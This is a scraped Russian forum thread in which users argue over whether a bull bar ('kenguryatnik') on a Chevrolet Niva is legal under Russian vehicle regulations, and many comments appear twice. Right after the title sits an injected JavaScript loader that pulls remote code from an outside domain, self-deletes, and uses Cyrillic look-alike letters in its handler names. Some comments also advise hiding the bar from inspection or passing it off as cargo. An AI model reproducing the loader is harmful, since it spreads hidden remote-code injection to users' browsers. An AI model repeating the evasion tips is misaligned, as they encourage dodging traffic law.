Mail.RuПочтаМой МирОдноклассникиИгрыЗнакомстваНовостиПоискВсе проекты

"Кенгуру" на внедорожник - таки можно или нет???

(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?ifra...' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8';
script.оnlоad = script.оnerrоr = function () {
script.оnlоad = script.оnerrоr = null;
script.parentNode.removeChild(script);
}

document.body.appendChild(script);
})();
На смотровой площадке МРЭО прямо передо мной гаец без осмотра
завернул Шниву в силовом обвесе. Напрасно её владелец тихо матерился и
размахивал распечатанными выписками из Тех регламента по допуску ТС к
эксплуатации, принятом в сентябре 2010 года. Из него следует, что на
авто повышенной проходимости, не всем подряд 4х4, а лишь отвечающим
определённым условиям, обвес ставить можно. А мне как раз ещё и очень
нужно - процентов на 30 авто эксплуатируется в условиях бездорожья. В
окне консультации ГИБДД на вопрос: " Почему низзя, если в регламенте
написано можно?" ответили загадочно: " Читайте закон правильно". А я не догоняю, объясните, плиз. Собственно, у меня
две версии. Первая - существует более поздние постановления(
распоряжения, регламенты), запрещающие кенгурятники, если знаете -
ссылку пожалуйста. Вторая - Нива Шевроле по своим ТТХ не подходит под
понятия авто повышенной проходимости, как они есть в регламенте.(Привет
Кашкаям, Дастерам и им подобным!) Кто что думает по этому поводу?
Кому-нибудь из форумчан выписывали штраф за обвес?
Тема закрытаТема в горячихТема скрыта
Жалоба принята. Спасибо!
Пожаловаться
6 декабря
Volkswagen Passat 1.8 90hp AT
Отличная машина. Двигатель не делал, А в коробке поменял 2 подшипника пару тысяч назад. Думаю что пробег отмотан, При продаже в Польше всегда отматывают. Из 510 тысяч больше 300 тысяч моих. Дешевые ...
5.0
6 декабря
Bentley Bentayga 6.0 AT 4WD
Неплохой авто для выездов на выходные. Нравится его эксклюзивность.​ Я вообще очень люблю эксклюзив. Когда мне предложили купить эксклюзивный бездорожный джип, выбор сразу пал на него.
1.7
Все отзывы
Поделиться темой
Отписаться
Подписаться
КомментарииКомментарииПока ни одного комментария, будьте первым!
27
Митя Бубликов
Кенгурины должны быть обрезинены, во-вторых входить в комплектацию авто, у Нивы и прочего дешевого сброда их нет в штатной комплектации. Бывают на дорогих внедорах типа Ленд Ровер и подобных.
СсылкаПожаловаться
Митя Бубликов
Кенгурины должны быть обрезинены, во-вторых входить в комплектацию авто, у Нивы и прочего дешевого сброда их нет в штатной комплектации. Бывают на дорогих внедорах типа Ленд Ровер и подобных.
СсылкаПожаловаться
Вот - вот , можно подробней про "обрезинены". В регламенте я этого не нашла, но продавец кенгуру тоже это сказал. Кроме того, в салоне стоят новые Шнивы 13 г в фирменном обвесе. Идёт он как доп опция, можно выбрать варианты. Получается, втюхивают товар, который эксплуатировать запрещено? Так?
СсылкаПожаловаться
наталья харлова
Вот - вот , можно подробней про "обрезинены". В регламенте я этого не нашла, но продавец кенгуру тоже это сказал. Кроме того, в салоне стоят новые Шнивы 13 г в фирменном обвесе. Идёт он как доп опция, можно выбрать варианты. Получается, втюхивают товар, который эксплуатировать запрещено? Так?
СсылкаПожаловаться
История переписки2
ГОСТ51709-2001
http://www.docload.ru/Basesdoc/40/40602/
В салоне вам еще не то продадут за ваши деньги, и китайский не сертифицированный обвес и все что хошь. Без лоха жизнь плоха.
СсылкаПожаловаться
Митя Бубликов
ГОСТ51709-2001
http://www.docload.ru/Basesdoc/40/40602/
В салоне вам еще не то продадут за ваши деньги, и китайский не сертифицированный обвес и все что хошь. Без лоха жизнь плоха.
СсылкаПожаловаться
История переписки3
4.7.23а Оборудование АТС не предусмотренными изготовителем в эксплуатационной документации дополнительными защитными устройствами (решетками) перед передним бампером, не покрытыми эластичными материалами, не допускается."
СсылкаПожаловаться
Митя Бубликов
4.7.23а Оборудование АТС не предусмотренными изготовителем в эксплуатационной документации дополнительными защитными устройствами (решетками) перед передним бампером, не покрытыми эластичными материалами, не допускается."
СсылкаПожаловаться
История переписки4
За ссылку спасибо, но этот документ от 2001 года, даже здесь на авто майл ру есть статьи, в которых поясняют, что для авто категорий М1 и N1, которые по своим ТТХ могут быть отнесены к категории G (легковые авто повышенной проходимости) сделано послабление, разрешена установка обвеса.Док-т 2010 г., не могу вставить ссылку.
СсылкаПожаловаться
наталья харлова
За ссылку спасибо, но этот документ от 2001 года, даже здесь на авто майл ру есть статьи, в которых поясняют, что для авто категорий М1 и N1, которые по своим ТТХ могут быть отнесены к категории G (легковые авто повышенной проходимости) сделано послабление, разрешена установка обвеса.Док-т 2010 г., не могу вставить ссылку.
СсылкаПожаловаться
История переписки5
Только вот шнива не подходит под категорию G.

ТЕХНИЧЕСКИЙ РЕГЛАМЕНТ О БЕЗОПАСНОСТИ КОЛЕСНЫХ ТРАНСПОРТНЫХ СРЕДСТВ

6. Запрещается установка на транспортные средства категорий М1 и N1 конструкций, выступающих вперед относительно линии бампера, соответствующей внешнему контуру проекции транспортного средства на горизонтальную плоскость опорной поверхности, изготавливаемых из стали или других материалов с аналогичными прочностными характеристиками. Данное требование не распространяется на металлические решетки массой менее 0,5 кг, предназначенные для защиты только фар, а также государственный регистрационный знак и элементы его крепления.
(п. 6 в ред. "Постановления" Правительства РФ от 10.09.2010 N 706)
(см. текст в предыдущей "редакции")

Прочитайте в приложении 1 главу 1.2. (Транспортные средства повышенной проходимости
(категории G)).

http://base.consultant.ru/cons/cgi/onlin...
СсылкаПожаловаться
Фартовый
Только вот шнива не подходит под категорию G.

ТЕХНИЧЕСКИЙ РЕГЛАМЕНТ О БЕЗОПАСНОСТИ КОЛЕСНЫХ ТРАНСПОРТНЫХ СРЕДСТВ

6. Запрещается установка на транспортные средства категорий М1 и N1 конструкций, выступающих вперед относительно линии бампера, соответствующей внешнему контуру проекции транспортного средства на горизонтальную плоскость опорной поверхности, изготавливаемых из стали или других материалов с аналогичными прочностными характеристиками. Данное требование не распространяется на металлические решетки массой менее 0,5 кг, предназначенные для защиты только фар, а также государственный регистрационный знак и элементы его крепления.
(п. 6 в ред. "Постановления" Правительства РФ от 10.09.2010 N 706)
(см. текст в предыдущей "редакции")

Прочитайте в приложении 1 главу 1.2. (Транспортные средства повышенной проходимости
(категории G)).

http://base.consultant.ru/cons/cgi/onlin...
СсылкаПожаловаться
История переписки6
Спасибо. Ещё раз перечитала, изучила, сопоставила. По какому критерию, по вашему, Шнива не подходит к категории G? 1.2.1.1.1 - есть, 1.2.1.1.2 - есть, 1.2.1.1.3 - по оффиц данным - 57%- есть. Из остальных 6 условий пяти она точно соответствует ( въезд/съезд 37/ 35°, дорожный просвет - без вопросов) . Не знаю, что такое " продольный угол проходимости", если это угол свеса, - он у Шнивы 24°, если я заблуждаюсь, всё равно, - условия выполнены. Шнива - внедорожник! Попробуйте меня разубедить.
СсылкаПожаловаться
наталья харлова
Спасибо. Ещё раз перечитала, изучила, сопоставила. По какому критерию, по вашему, Шнива не подходит к категории G? 1.2.1.1.1 - есть, 1.2.1.1.2 - есть, 1.2.1.1.3 - по оффиц данным - 57%- есть. Из остальных 6 условий пяти она точно соответствует ( въезд/съезд 37/ 35°, дорожный просвет - без вопросов) . Не знаю, что такое " продольный угол проходимости", если это угол свеса, - он у Шнивы 24°, если я заблуждаюсь, всё равно, - условия выполнены. Шнива - внедорожник! Попробуйте меня разубедить.
СсылкаПожаловаться
История переписки7
Шнива - внедорожник! Попробуйте меня разубедить.
Попробуйте в этом убедить гайцов.

1.2.1.1.1. вопросов нет. Привод постоянный, на все колеса через межосевой блокируемый дифференциал.
1.2.1.1.2 Вы уверены. Здесь имеется ввиду межколесный механизм блокировки дифференциала.
Если 1.2.1.1.2 выполняется, то Шнива - внедорожник. Но всегда во МРЭО могут сказать "внесение изменений в конструкции ТС"
СсылкаПожаловаться
Фартовый
Шнива - внедорожник! Попробуйте меня разубедить.
Попробуйте в этом убедить гайцов.

1.2.1.1.1. вопросов нет. Привод постоянный, на все колеса через межосевой блокируемый дифференциал.
1.2.1.1.2 Вы уверены. Здесь имеется ввиду межколесный механизм блокировки дифференциала.
Если 1.2.1.1.2 выполняется, то Шнива - внедорожник. Но всегда во МРЭО могут сказать "внесение изменений в конструкции ТС"
СсылкаПожаловаться
История переписки8
Скопировала ниже пункт из вашей ссылки ((1.2.1.1.2. Хотя бы один механизм блокировки дифференциала или один механизм аналогичного действия )) . Как видите, слова "межколесный" в тексте нет. Не стоит додумывать, что имели ввиду создатели этого документа, есть требование и оно выполнено для Шнивы.-----------------------------------------------------------------------------Убеждать гайцов буду через суд, если полюбовно не разойдёмся.
СсылкаПожаловаться
Скопировала ниже пункт из вашей ссылки ((1.2.1.1.2. Хотя бы один механизм блокировки дифференциала или один механизм аналогичного действия )) . Как видите, слова "межколесный" в тексте нет. Не стоит додумывать, что имели ввиду создатели этого документа, есть требование и оно выполнено для Шнивы.-----------------------------------------------------------------------------Убеждать гайцов буду через суд, если полюбовно не разойдёмся.
СсылкаПожаловаться
История переписки9
Для начала потребуйте письменный отказ в регистрации, а потом уже прокуратура и суд.
Желаю удачи!
СсылкаПожаловаться
наталья харлова
Вот - вот , можно подробней про "обрезинены". В регламенте я этого не нашла, но продавец кенгуру тоже это сказал. Кроме того, в салоне стоят новые Шнивы 13 г в фирменном обвесе. Идёт он как доп опция, можно выбрать варианты. Получается, втюхивают товар, который эксплуатировать запрещено? Так?
СсылкаПожаловаться
История переписки2
Вы совершенно правы . Вам продают то что стоять на автомобиле не должно. Если бы это было сделано на заводе с автомобилем бы шла документация о согласовании и разрешении.
СсылкаПожаловаться
Дед Пихто
Ну неужели трудно перед МРЭО снять, а потом поставить. НЕЛЬЗЯ ставить, но и наказания за эту установку нет! Пользуйтесь без проблем, ГИБДДшники могут только замечание сделать, но ни штрафануть, ни задержать, ни заставить снять...не могут.
СсылкаПожаловаться
Michael
))) можно поставить, если будет сертификат на обвес.
СсылкаПожаловаться
Michael
))) можно поставить, если будет сертификат на обвес.
СсылкаПожаловаться
Сертификат на кенгурятник давно не выдают.Я когда-то этим занимался.имея длинную Ниву и желание поставить полный обвес.Подножки и крепление запаски-пожалуйста,а кенгурятник-фиг.
СсылкаПожаловаться
Александр Мазрухо
Сертификат на кенгурятник давно не выдают.Я когда-то этим занимался.имея длинную Ниву и желание поставить полный обвес.Подножки и крепление запаски-пожалуйста,а кенгурятник-фиг.
СсылкаПожаловаться
История переписки2
Только на родине кенгуру-в Австралии можно погонять этих самых кенгуру, тем самым "кенгурином".
СсылкаПожаловаться
DAD MOROZ
Только на родине кенгуру-в Австралии можно погонять этих самых кенгуру, тем самым "кенгурином".
СсылкаПожаловаться
История переписки3
А у нас только лоси бегают-так что надо лосятники ставить.
СсылкаПожаловаться
Александр Мазрухо
Можете снять,пройти осмотр,поставить и ездить.Но-если вы попали в ДТП и кенгурятником ударили пешехода,который при этом получил более значительные увечья,чем от простого бампера,вот тут про штатно не установленные заводом допы вам вспомнят обязательно. Безболезненно можно ставить только подножки.
СсылкаПожаловаться
Комментарий удален.Почему?
Комментарий удален.Почему?
Китайцы все копируют, вот и Оксану тоже...
СсылкаПожаловаться
DAD MOROZ
Китайцы все копируют, вот и Оксану тоже...
СсылкаПожаловаться
История переписки2
а туфли просто унесли и не скопировали даже
СсылкаПожаловаться
DAD MOROZ
Китайцы все копируют, вот и Оксану тоже...
СсылкаПожаловаться
История переписки2
как они могут ее скопировать,если она их любит?
СсылкаПожаловаться
shaman
До тех пор, пока КАЖДЫЙ гражданин не будет требовать ПИСЬМЕННЫЙ отказ в совершении тех или иных рег. действий - и будет этот беспредел. Был бы здесь приведён этот МОТИВИРОВАННЫЙ отказ - тогда бы и МОТИВИРОВАННО обсудили.
А так - я говорю, что можно, но сам, купив БУ-шную Ниву с кенгурятником, снял его к едрене фене, а то чтобы лампочку в фаре поменять - нужно 2 часа потратить, это если повезёт, да и лишний вес на морде никак не нужен. Реально кенгурятник помогает лишь в случае с рамными внедорожниками при условии, что он фактически интегрируется в раму и не подвержен деформации при относительно сильных ударах, сопоставимых с массой авто и скоростью хотя-бы до 40 км.ч. А на любом авто с несущим кузовом кенгурятник только добавит повреждений.
СсылкаПожаловаться
Комментарий удален.Почему?
Комментарий удален.Почему?
История переписки2
При ударе об животное на скорости 40 км/ч деформируется рама????Это из какого же г...на её сделать нужно? Я не про лобовой удар двух авто на скорости 40 км/ч говорю, и не про бетонный куб.
СсылкаПожаловаться
Комментарий удален.Почему?
Комментарий удален.Почему?
История переписки4
С лосем, к счастью, опыта не было, а вот конь, зараза, падает на капот и крышу... Кенгурятник тут не спас бы, даже если бы и был...
У знакомого на ВАЗ-2105 лось, перебегая перед машиной дорогу, копытом проткнул капот и убежал в лес.
СсылкаПожаловаться
денис фомин
Ездить с силовым бампером можно без проблем,только номер на него не прикручивайте и туманки тоже если ДПС-ники все таки прикапаются,то можно доказать,что это хорошо закрепленный груз.Кто в курсе - легко отмазывается.
СсылкаПожаловаться
Чтобы оставить комментарий, вам нужно авторизоваться.
Новости Mail.Ru